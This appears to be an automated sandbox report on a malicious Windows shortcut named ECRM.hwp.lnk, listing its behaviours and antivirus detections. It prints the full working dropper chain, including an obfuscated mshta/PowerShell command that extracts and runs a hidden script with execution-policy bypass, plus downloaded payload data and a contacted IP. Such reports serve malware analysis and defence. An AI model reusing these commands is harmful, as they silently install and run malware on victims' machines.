NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b68000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b69000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b6d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b6e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b6f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\programdata\e.ps1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\ECRM.hwp.lnk

Creates a suspicious process (5 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\e.ps1
cmdline	"C:\Windows\System32\mshta.exe" javascript:p="$w ([byte[]]($f "+"\| select -Skip 0x0beb)) -Force";k="c:\\pro"+"gramdata\\";b=" -Encoding Byte;sc ";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c="powe"+"rshell -ep bypass -c $t=0x1c4c;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:T"+"EMP\\\\*.l"+"nk \| where-object{$_.length -eq $t};};$w='"+k+"e.ps1';$f=gc $k"+b+p+b+k+"d3914 0;po"+"wersh"+"ell -ep bypass -f $w;";eval(s);
cmdline	powershell -ep bypass -c $t=0x1c4c;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0beb)) -Force -Encoding Byte;sc c:\programdata\d3914 0;powershell -ep bypass -f $w;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x1c4c;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0beb)) -Force -Encoding Byte;sc c:\programdata\d3914 0;powershell -ep bypass -f $w;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c " Invoke-Expression (Get-Content C:\\ProgramData\\AN9385.tmp);"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 13, 2025, 9:51 a.m.	show_type: 0 filepath_r: powershell parameters: -ep bypass -c $t=0x1c4c;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0beb)) -Force -Encoding Byte;sc c:\programdata\d3914 0;powershell -ep bypass -f $w; filepath: powershell	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 13, 2025, 9:51 a.m.	process_identifier: 944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x03c20000 process_handle: 0xffffffff	1	0	0

URL downloaded by powershell script (6 events)

Data received	UEsDBBQAAAAIAItWaFqACGt2nwMAAFAGAAAJAAAAMzgyNDMudG1wdVRrj+I2FP08/8IbTUXcAJs4CST1+sNoZ7uaD1Ufq2mjEjTKBEMC5CHbBBDKf+91wmurVkIC33Pv9bnH52Iud2Wq8qpE5i9plfF8lYVuQIZfqjwLA5HhU5MI9Ppalmnqui77e7eYutPjakV1PFnxUrH7QhN3QIlYD463vFypjO6zfMvNDx9mc3xS4njaQEKdCMlfSmVe25v2wVkkGP9o/g+2xBh/tA8+zZfmhjF2o/kueLKhLd9Kjk7LSpg5s2n+qaS5ZeGTVOLCaJbPO4pFotIMggCNu9/mx3hhfVxhijoYoC48s+fnIZCFHIo6VBX1uVTu3uErL1dm0Y8OuYjphHOVpqpjnxgiGAmudqLsEjfntFsHgi0duAXsIcFUQd5mnGaJeFKmDfTUdxHoPXIwPVNSytrcNXCGPWwh1d0puLybyxpEA30jvQiDmM6gbX8e7EqZ5Us1mJvnQF3VcMCYtm3aSfZmH7yQhCHHp7Ztzd+znbvaTbMhmkyJHzjemEDy1WJX85hvL+WCH4Zvz7uiOP6ZCNL7TC49dukBTurFupWxSydTFUO4OvATDnY5lQwKr3KXiwNTxQjsYk+6E/qBoV5yqJlMwzThumCmsfnlkitE2+F/EL0Rpe3dzry9Sr4gP8P5PIAS5EmI5MhuyHklanYFL1T71xgMKNKGzcCwGRg26wzb26vPn2Vny+qHl/9yq25i6fCdE9X3pgXOvEm2JqRq+heF75/mpno3x+awy/KvbGZMXM+O+HaLY+OBJg0SsbG2YsMYGr5P7Ci0SeggVscGBGVsFGmHBE4UGxDL5JbDQoyqes8FIFPX8yIrgVQ5QlUK+ch6P9Zdv4kXBFGJFs0jvF/zeRAbPxUJxEngTaJKrOACKHwuVBLH8PlNGEPD9YkTuVOixnVBB/Ixjnkcl88hQLZnuxEfqdj4DETKiqul3suvuiNxSNQsDrR5QU25qSAHPUI8mIR+
Data received	dIgNPQ0XUlrdVLHBR190VWj7EZKPSx4b9IGueV5VJcRD33ciYa/H4e4Ps5TrdbF3NTUSTCMbxBliu6VJmqqQdHeHYXRKcdZyU+gRiB0CT1a5IQkQKNwILb9m4zlOtIkN5hLiSVc2SMpNreUlQRgJGhtCnY7Ng0hWaL/s7iS+O43ctQhtxOAfZ8+f1tV6r3uRiRM1EX//la8VyG6mf6lca+4SH15KpHUOk4IO38bfMpjamNOLIW47h0/nVenNQdvL6txtbPsPUEsDBBQAAAAIANZLY1r22Muq5wMAAN4GAAAIAAAATjkzNzEuanOFVFtv4jgUfuZfeKKuSDbAJM4Fsp48VHNZ9WmrrTpjiaAqJE6TQhzqODQI5b/vcQiUrrRahAQ+37l+/o71rOGJLCqO9Lvv/K1qE+bPseNO7g9pYM9dxzjuY4Ee7hpWNHlSNG54/1qV6X7dFK50iQLjZ8Zl+CFcN3qEo/CEzraMP8ucvOXFlumfPi1XxlGKw3EDDrtY1OyOS/2qiG61dhobxu/6f6KZYRifrdYjRaZvwjB8b3gtWLwhHdvWDB2zSuhFaJHiCyeFaRrHWopzV8ti1bdZxjLJwQjQrP+vf45S8/OzQVAPA9Sbl9ZqGASZyCaoR2W5G0LrZg0/BX/Wy9P44ItC5TBEqVaV7UuIsIEEk43gveNmcHvPgA3zo8GaYINI8NvMkjwWt1K3oD35wQK5p7ZBhpakNDdXCezJCTaR7GsKVl/NZY7pWFUkZ2JQqDxIdzqPG17nRSbHK30w7KodHAyDdF3SU/ZktW6Ag4AZx67r9F8N5x52PG+CsG8tFha4XrR2LSH96Y6nrJ08fWvK8vAzFvgkuTpzw0sS0NOJrg+h4TmhLssJ1F94MQPVHHkIwRfOedqGspyCZiy/P6HfQnTiHWL8eZDETAUsFbY617lApJv8X7+ku1qjp8eapfgHnIc5pMC3QsSH8OnxjAzrsQsv4Lnb062MxwQp4eYg3ByEm/fCPcns5L/MB+kqAdT/Uq1K
Data received	YirzlSLlR/FCz2wfb3VwVe1fiL6+pSv2h0fgsWj283Cpgc2lZhVp7C3SRKSZeY1YpO0iTZtotmfbdLpja7Q7mJEWR9q23iIAAm+BKQSVEBCXKb9BdYumCSALe27R8Os4iv64j6JKQNgavi1AbhAEtIy/xTKCj5SzxbMUMQDe3PHo69sralHI/pzK8utuTG4AsDD2aSU5Z0i2N2tI1Jp9Y5bj2JRXezhtIm3K2u8k0tAdINifexTemUirobeqQNy8gXF6xPZpG2lkROI9Ei+bV+f1TQ2JFz7FIYIED78gYRJpgXACNYsf+NTFC0i0ZYBsI62INDhxRUHgLmgMmyUY3O/LmoSjvcpm+Zii5LaQbP8XfVkjxpmq4ri2RR0H1ooYUD1OkNQ3Lz3gWBRKPgISaaMREzzDoATFi2Mv6MvfM97UepbamGFRrRWR3hxqGFZH4iSReu4wH88nPZG+Q4WAtVXdq5stePUT5W2TLprMVWroWXUdmh2N/UjEDLGtXqZ1puyuE9BsRJhoJBcMhduTPQgsi3ZCHg8qgiPmlkRNGngODYG1Xi3mTOYPwBRWjVuB71KU1jjDtu/MseImFtqKXHT4vu/GcVjTQZOkO+/t9ZPR/QNQSwMEFAAAAAgACn1PWrG05DeUAwAAQwUAAAoAAABuRDkzMjcudG1wVZQLb6pMEIb/CjGmaDw2sGhba0w+tRahSCtSKDRNulwKC8ulglIw/vdvgfakJ2a8zbszzyzvbtdDo6vZf73+tHuAiJ118oMWqR5zJwQsMLGo2mGyvbsWlo8jI5DRfPfkGWATObHz8z+zCqTxcyAVQiAxRiDUaxM/MHGqw1ZTGkh5cY54LVQpL+AcWJ+LUv7yAmGyXcvV9sWMFV4sysqyO68sYC4vwdu06/ohmHUOpfjAFI+pt7N8LbIZ+d7BTij9hauBbF6uBNLQ5M2mYYjMygAOUJZC5vGPkRbBVFk+MGPdTL/AtpB57bBZOwTEOMpYYsjAB0Y3GfnFVRdLJyB6NHmWOAdF
Data received	WVUTcS2Rl3xyhKhIJ5GZ5z/Nlg94rMONohtYxFKk6XLp804D5ulmoqhmIq7bIX6DesjGzRrtezAsPeFQyjXeqTD37G05A6eR8cSWDh6vhMkcmVgL7ERZl9CqoW5aKNv1R7PO56HmIZp8XtrVPW+PRV4oNF3yCt7CPrBLDTjHRbyUMxUexWqTY2BFLIAh2ST8pUOeXTrsZCXcLJYQ+7yM/ej7ye821SKWqolu2/e84yu65YuceRTXtp1WRuOIEFjlRrVKBxEwDrRgQZRmEzA7pXAPo143jmN23P9I9i60/fbnFYVi6jtBnXauOhRUN6IoDe6FuYXd2wQ9LK4oqke95mW6eut1TuB8Ys4n9twZflD0o3x0FfoPrZKw6X6fmlLUBRGxjQjUItrNhxok+R2JPYKkKt2nhjKMXKrX+VWrpiCSmzqrQXwgafLyVurwOFcQXOAVRSVCWOMMtTl+dqn+7W2Pvt8n0YIe0DBzyfsVidEu36OYfPHo/qUQH5PQ7XVP8btM5j33+9PLdoqGsencQv2ha9B9TfoP4Y+OjlmGJOP4F+AwSMgGttXfZfbmTA1hRr3aPty/vr2RXhe/duzENWVCd7gidb5I1HDkI927WYaSujCpRAq9s8x5ej5Pu8T9Y2KtTOONKl+LXliKhbOU4hGwUpmzsciJmV1aYKzv4qIUR9qzhOt8BsSIRcJErtyJQuKexIKEWLnIQ1J9FNC3Zf4epfnSwmL5gLZRc4EADbT2+0d3LMraYNetwaBlX806UUos6hRhtRmPQnWM149VGGwQc+eECqrt/qFnX7bXeeVG7TK8L73rWXPbDZpLZtAc7EFzkgbN0IOm9rS5GwezdgXV7jZNTy+ob29TjWD6P1BLAwQUAAAACADHU2paO38cvjEEAAC3BgAABwAAAHR0OC50bXCdVVuPokgU/ivGdMbuOD2BQtp2jMkKtlxUHBEBq9MPUIVcC1BRxE7/9y3U2dlsJ5PdfSBieeqzvss5dbetOk+DP+4f+ndhWjCDZnbM
Data received	dWudqLKz4pduonOI18YKo1lwqwKjQDacC8sfvp/CBMsOm4D1QbOxplcer8o4X6yWwKRr0IJnXVQwJm5O18+FaecrC1e6rPrMSOFVzmXGEjyMLSNTbMiYlhuo9rosxpNiTFAgcF6MbXjoSbCjm1gTQveYSDjiLUzyxairiHPmJZryq2haKtGUWUdKjcuoo/k5HjlbvZqHsTEHt/UUA8zpHD6vJfVUOQg3XwHgv30Db/27jR+zg2ZR/uIiKl1haR96lsMINowCW++YEmbZF5jwwI15ax2O42nKW048tmAVSOaBsSCj2Z5RjJVMk3CgSUqvGHnEBDgzbSfiAaL7Vb9DEKvbsBKWm+7Cdjrmi9JNlpNyOJpV/pLyfcH5GJiHT/qKCtMjbuGLCknA/CWJcaIRl+KjeChO0xVA+zGB6VDE50QyGN6ChcnBarya+n6tr20cEHGdTZwfa+69K3c32oFBszzVkqJK49YGjnliUhhdhZQ6T2Ci2VN/AfCFeiCblIbSG4qfqE2YxcZnZOUfR/stzkG1MWMS5A9F5f9S+i9xvTnPgZvzYcINmocKx3tjUgocLnsSpFJPKlOCgUlWRW2vzq0Oz6vlXxYLIo5M4oS91ZQziVHH61aPapyMuZwHG9RmmQ9nHf882+bAfdLFWjdUYhkddcuI43KeIwA5LGNOi2DN+Vd8xUnNNz+BRanReM1knBRgfdSSKdXL+O1ZfIqREeeYyyqNFmTpWWIarX0iORwKSM3/lvx95XVq99NpNZNRoct2oNvrmLXWlVpNQgTcSpDtpxm59BBhgVtqthsPK8+PxZm/onkcig5Dezw5xVN+EWmdDoFHlhrohzAXqnleZ5qaV/fJkg9RcjXrOgP+Xk/FSMwUMVeRnLMpu1KP9hzts2I8qkX8ZNLP9X9r0q3+7CCv1uD5qoGfbEumO3jPnZ1D7u9OZ+e5+7DJdp6Dgvs7L4h7z40wbdx+aLzfBWT/xA5exSw9ervi7fv3+9Z4l7XaLUIfwdl7T51lsQvpl9Rv
Data received	PdwgHugfZVseDB6jjKLdX1Eaj86+8YoCZ/f69vbQ/3LffOc+3sHHO/vxznw0HzeNVpa2vra8/T6sPx5fTvmOvijpMYtbD40rZv/jg6LHKU+tdAeDxaYbi3SYiCgxJdeoB83aco8CRw0WlT1Nqr+PYNGT0JmVVH9tTf0ZzYVge6FA97C05mTBTEtRgjm3pCb+Mr5OEdGLhY1/CCKdmyMN+JFLepZbD/uuspyd6+AM/Xh7oo3G/gxasj+UT4PLDdO+zNv2ZfK0Lx3YvuSwfaHQv9xH7cF1R+OqVqvV/9K4GdW4FPT/BFBLAQIfABQAAAAIAItWaFqACGt2nwMAAFAGAAAJACQAAAAAAAAAIAAAAAAAAAAzODI0My50bXAKACAAAAAAAAEAGADH5tUrGJDbAQD84UEYkNsBAPzhQRiQ2wFQSwECHwAUAAAACADWS2Na9tjLqucDAADeBgAACAAkAAAAAAAAACAAAADGAwAATjkzNzEuanMKACAAAAAAAAEAGADjbQDwHozbAeNtAPAejNsB420A8B6M2wFQSwECHwAUAAAACAAKfU9asbTkN5QDAABDBQAACgAkAAAAAAAAACAAAADTBwAAbkQ5MzI3LnRtcAoAIAAAAAAAAQAYAFmEruu/f9sBBkjnAsB/2wEGSOcCwH/bAVBLAQIfABQAAAAIAMdTalo7fxy+MQQAALcGAAAHACQAAAAAAAAAIAAAAI8LAAB0dDgudG1wCgAgAAAAAAABABgA1gVFaaeR2wHWBUVpp5HbAfXbTNamkdsBUEsFBgAAAAAEAAQAagEAAOUPAAAAAA==

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW March 13, 2025, 9:51 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 13, 2025, 9:51 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 13, 2025, 9:51 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\System32\mshta.exe" javascript:p="$w ([byte[]]($f "+"\| select -Skip 0x0beb)) -Force";k="c:\\pro"+"gramdata\\";b=" -Encoding Byte;sc ";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c="powe"+"rshell -ep bypass -c $t=0x1c4c;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:T"+"EMP\\\\*.l"+"nk \| where-object{$_.length -eq $t};};$w='"+k+"e.ps1';$f=gc $k"+b+p+b+k+"d3914 0;po"+"wersh"+"ell -ep bypass -f $w;";eval(s);
cmdline	powershell -ep bypass -c $t=0x1c4c;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0beb)) -Force -Encoding Byte;sc c:\programdata\d3914 0;powershell -ep bypass -f $w;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x1c4c;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0beb)) -Force -Encoding Byte;sc c:\programdata\d3914 0;powershell -ep bypass -f $w;

Communicates with host for which no DNS query was performed (1 event)

host

64.20.59.148

Executes JavaScript in a commandline (1 event)

cmdline

"C:\Windows\System32\mshta.exe" javascript:p="$w ([byte[]]($f "+"| select -Skip 0x0beb)) -Force";k="c:\\pro"+"gramdata\\";b=" -Encoding Byte;sc ";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c="powe"+"rshell -ep bypass -c $t=0x1c4c;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:T"+"EMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+k+"e.ps1';$f=gc $k"+b+p+b+k+"d3914 0;po"+"wersh"+"ell -ep bypass -f $w;";eval(s);

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c " Invoke-Expression (Get-Content C:\\ProgramData\\AN9385.tmp);"
parent_process	powershell.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\e.ps1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2988 resumed a thread in remote process 944
NtResumeThread March 13, 2025, 9:51 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 944	1	0	0

Creates a suspicious Powershell process (4 events)

option	-ep bypass	value	Attempts to bypass execution policy
option	-ep bypass	value	Attempts to bypass execution policy
option	-ep bypass	value	Attempts to bypass execution policy
option	-ep bypass	value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Lionic	Trojan.WinLNK.Pantera.4!c
CTX	lnk.trojan.runner
CAT-QuickHeal	cld.lnk.trojan.1741710912
ALYac	Trojan.Agent.LNK.Gen
VIPRE	Heur.BZC.YAX.Pantera.41.A69C39E6
Arcabit	Heur.BZC.YAX.Pantera.41.A69C39E6
VirIT	Trojan.LNK.Heur.A
Symantec	Trojan.Gen.MBT
ESET-NOD32	LNK/Agent.AHC
Kaspersky	HEUR:Trojan.Multi.Runner.c
BitDefender	Heur.BZC.YAX.Pantera.41.A69C39E6
MicroWorld-eScan	Heur.BZC.YAX.Pantera.41.A69C39E6
Rising	Trojan.Agent/LNK!8.197F2 (TOPIS:E0:FZYyYdDVid)
Emsisoft	Heur.BZC.YAX.Pantera.41.A69C39E6 (B)
F-Secure	Trojan:W32/LnkGen.C
Sophos	Troj/LnkDrop-M
FireEye	Heur.BZC.YAX.Pantera.41.A69C39E6
Google	Detected
Microsoft	Trojan:Script/Wacatac.B!ml
ZoneAlarm	Troj/LnkDrop-M
GData	Heur.BZC.YAX.Pantera.41.A69C39E6
Varist	LNK/ABTrojan.BPSQ-
AhnLab-V3	Downloader/LNK.Agent.SC254930
Zoner	Probably Heur.LNKScript
Tencent	Win32.Trojan.Runner.Fajl
huorong	Trojan/LNK.Starter.bj
alibabacloud	Trojan:Win/Runner.c

ECRM.hwp.lnk

Process Tree Toggle all

